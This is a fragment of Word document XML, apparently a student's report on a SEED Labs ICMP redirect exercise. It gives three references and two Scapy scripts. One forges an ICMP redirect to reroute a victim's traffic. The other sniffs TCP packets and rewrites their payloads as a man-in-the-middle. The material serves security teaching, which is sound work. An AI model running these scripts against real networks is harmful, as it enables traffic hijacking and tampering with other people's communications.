          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71E10DD9" w14:textId="77777777" w:rsidR="00C63ADA" w:rsidRDefault="00C63ADA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CBE3942" w14:textId="77777777" w:rsidR="00E560F9" w:rsidRDefault="00E560F9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C2895A5" w14:textId="77777777" w:rsidR="00621924" w:rsidRDefault="00621924">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CB9FDC7" w14:textId="77777777" w:rsidR="00621924" w:rsidRDefault="00621924">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F0F1A52" w14:textId="77777777" w:rsidR="00621924" w:rsidRDefault="00621924">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AA63445" w14:textId="77777777" w:rsidR="00621924" w:rsidRDefault="00621924">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DADBBD6" w14:textId="77777777" w:rsidR="00621924" w:rsidRDefault="00621924">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B90CF16" w14:textId="77777777" w:rsidR="00621924" w:rsidRDefault="00621924">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D87A031" w14:textId="77777777" w:rsidR="00621924" w:rsidRDefault="00621924">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D0C5AD0" w14:textId="77777777" w:rsidR="00701485" w:rsidRDefault="00701485">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D886541" w14:textId="77777777" w:rsidR="00701485" w:rsidRDefault="00701485">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="700B3AE9" w14:textId="77777777" w:rsidR="00701485" w:rsidRDefault="00701485">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D6C8977" w14:textId="194856AF" w:rsidR="009A61A9" w:rsidRPr="00543DDA" w:rsidRDefault="009A61A9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00543DDA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Reference</w:t>
      </w:r>
      <w:r w:rsidR="00C63ADA" w:rsidRPr="00543DDA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67BE2800" w14:textId="68FDE648" w:rsidR="009A61A9" w:rsidRPr="00CA3D3F" w:rsidRDefault="009A61A9" w:rsidP="009A61A9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA3D3F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA3D3F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>[ Rublon Authors, December 14, 2023]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39974A40" w14:textId="77777777" w:rsidR="00C63ADA" w:rsidRPr="00CA3D3F" w:rsidRDefault="00C63ADA" w:rsidP="00C63ADA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA3D3F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>https://rublon.com/blog/how-to-prevent-man-in-the-middle-attacks-on-your-network/</w:t>
      </w:r>
      <w:r w:rsidR="009A61A9" w:rsidRPr="00CA3D3F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7264C6D2" w14:textId="186C5F04" w:rsidR="009A61A9" w:rsidRPr="00CA3D3F" w:rsidRDefault="00C63ADA" w:rsidP="00C63ADA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA3D3F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA3D3F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>[ Wenliang Du, 2020 ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52529F8B" w14:textId="4766ADCB" w:rsidR="00C63ADA" w:rsidRPr="00CA3D3F" w:rsidRDefault="00C63ADA" w:rsidP="00C63ADA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA3D3F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>https://seedsecuritylabs.org/Labs_20.04/Networking/ICMP_Redirect/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32AABD1C" w14:textId="6BC2895E" w:rsidR="00CA3D3F" w:rsidRPr="00CA3D3F" w:rsidRDefault="00CA3D3F" w:rsidP="00CA3D3F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA3D3F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>[ Yathaarth Swaroop, September 18,2021 ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18067A63" w14:textId="73DE4FDD" w:rsidR="001C6AB7" w:rsidRPr="00CA3D3F" w:rsidRDefault="00CA3D3F" w:rsidP="00CA3D3F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA3D3F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>https://www.encryptionconsulting.com/everything-about-man-in-the-middle-attack/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77617C68" w14:textId="2E9AF096" w:rsidR="00475E72" w:rsidRPr="00543DDA" w:rsidRDefault="00475E72" w:rsidP="00C63ADA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00543DDA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>Codes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391CD4D9" w14:textId="3418F8F7" w:rsidR="00475E72" w:rsidRPr="00543DDA" w:rsidRDefault="0017534C" w:rsidP="00CA3D3F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00543DDA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t xml:space="preserve">Redirect.py </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08FE291A" w14:textId="77777777" w:rsidR="00621924" w:rsidRPr="00621924" w:rsidRDefault="00621924" w:rsidP="00621924">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="460E48C7" w14:textId="546E9645" w:rsidR="0017534C" w:rsidRPr="00621924" w:rsidRDefault="0017534C" w:rsidP="00C63ADA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00621924">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>#!/usr/bin/python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E69A83B" w14:textId="6667C70F" w:rsidR="0017534C" w:rsidRPr="00621924" w:rsidRDefault="0017534C" w:rsidP="00C63ADA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00621924">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>from scapy.all import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229F7E50" w14:textId="77777777" w:rsidR="0017534C" w:rsidRPr="00621924" w:rsidRDefault="0017534C" w:rsidP="00C63ADA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11FA3575" w14:textId="24F5FD28" w:rsidR="0017534C" w:rsidRPr="00621924" w:rsidRDefault="0017534C" w:rsidP="00C63ADA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00621924">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t># default ip addresses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FEA96F4" w14:textId="6C1A48EF" w:rsidR="0017534C" w:rsidRPr="00621924" w:rsidRDefault="0017534C" w:rsidP="00C63ADA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00621924">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>ip = IP(src=”10.9.0.11”, dst=”10.9.0.5”)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C8FF43" w14:textId="11927ABD" w:rsidR="0017534C" w:rsidRPr="00621924" w:rsidRDefault="0017534C" w:rsidP="00C63ADA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00621924">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>icmp = ICMP(type=5, code=1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0694E105" w14:textId="7FF62199" w:rsidR="0017534C" w:rsidRPr="00621924" w:rsidRDefault="0017534C" w:rsidP="00C63ADA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00621924">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>icmp.gw = “10.9.0.111”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6D2279" w14:textId="4D484D51" w:rsidR="0017534C" w:rsidRPr="00621924" w:rsidRDefault="00F674E2" w:rsidP="00C63ADA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00621924">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>#triggering packet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294B0C67" w14:textId="18E87194" w:rsidR="00F674E2" w:rsidRPr="00621924" w:rsidRDefault="00F674E2" w:rsidP="00C63ADA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00621924">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>ip2 = IP(src=”10.9.0.5”, dst=”192.168.69.5”)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F4D42F" w14:textId="77777777" w:rsidR="00F674E2" w:rsidRPr="00621924" w:rsidRDefault="00F674E2" w:rsidP="00C63ADA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A6A2EE1" w14:textId="607EDC6E" w:rsidR="00F674E2" w:rsidRPr="00621924" w:rsidRDefault="00F674E2" w:rsidP="00C63ADA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00621924">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t># Send the malicious redirect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1E14C8" w14:textId="4FE67A16" w:rsidR="0067058E" w:rsidRPr="00621924" w:rsidRDefault="00F674E2" w:rsidP="00CA3D3F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00621924">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>Send(ip/icmp/ip2/ICMP())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77EA8102" w14:textId="5A1D6510" w:rsidR="00F674E2" w:rsidRPr="00621924" w:rsidRDefault="00E560F9" w:rsidP="00CA3D3F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00621924">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>mitm</w:t>
      </w:r>
      <w:r w:rsidR="00F674E2" w:rsidRPr="00621924">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>_sample.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="750386D2" w14:textId="77777777" w:rsidR="00F674E2" w:rsidRPr="00F674E2" w:rsidRDefault="00F674E2" w:rsidP="00F674E2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EDDCC17"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from scapy.all import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DEB55E9" w14:textId="77777777" w:rsidR="0067058E" w:rsidRPr="00621924" w:rsidRDefault="0067058E" w:rsidP="0067058E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="784BB763"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print("LAUNCHING MITM ATTACK.........")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC758F7" w14:textId="77777777" w:rsidR="0067058E" w:rsidRPr="00621924" w:rsidRDefault="0067058E" w:rsidP="0067058E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79ACA2EA"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def spoof_pkt(pkt):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF2EB22"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newpkt = IP(bytes(pkt[IP]))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78336891"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del(newpkt.chksum)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="673F6E32"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del(newpkt[TCP].payload)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0773672F"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del(newpkt[TCP].chksum)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714A2294"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441D83EC"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if pkt[TCP].payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5ACDD3"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data = pkt[TCP].payload.load</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2596F05F"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print("*** %s, length: %d" % (data, len(data)))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A902263"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7683FA71"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 Replace a pattern</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="402BB005"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newdata = data.replace(b'seedlabs', b'AAAAAAAA')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="670C8A1A"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send(newpkt/newdata)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="671B02ED"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else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124C2521"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 xml:space="preserve">        send(newpkt)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E390D1A" w14:textId="77777777" w:rsidR="0067058E" w:rsidRPr="00621924" w:rsidRDefault="0067058E" w:rsidP="0067058E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DB85512" w14:textId="77777777" w:rsidR="0067058E" w:rsidRPr="00621924" w:rsidRDefault="0067058E" w:rsidP="0067058E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00621924">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>f = 'tcp'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E8A43B" w14:textId="63A456F9" w:rsidR="00F674E2" w:rsidRPr="00621924" w:rsidRDefault="0067058E" w:rsidP="0067058E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00621924">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>pkt = sniff(iface='eth0', filter=f, prn=spoof_pkt)</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00F674E2" w:rsidRPr="006219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113D8" w14:textId="77777777" w:rsidR="00ED3B1F" w:rsidRDefault="00ED3B1F" w:rsidP="00977F65">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="66A56199" w14:textId="77777777" w:rsidR="00ED3B1F" w:rsidRDefault="00ED3B1F" w:rsidP="00977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17D31" w14:textId="77777777" w:rsidR="00ED3B1F" w:rsidRDefault="00ED3B1F" w:rsidP="00977F65">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="00307550" w14:textId="77777777" w:rsidR="00ED3B1F" w:rsidRDefault="00ED3B1F" w:rsidP="00977F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11311"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2986580E"/>
    <w:lvl w:ilvl="0" w:tplc="D8421EFC">
      <w:start w:val="2"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:eastAsia="Times New Roman"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C24FD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="982A1170"/>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523047"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="47B6A1D8"/>
    <w:lvl w:ilvl="0" w:tplc="CEFA086A">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="(%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1080" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:b/>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620E0D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7EBA4A02"/>
    <w:lvl w:ilvl="0" w:tplc="59B27D6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A27273"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DC6A9208"/>
    <w:lvl w:ilvl="0" w:tplc="FB42B5A4">
      <w:start w:val="2"/>
      <w:numFmt w:val="bullet"/>
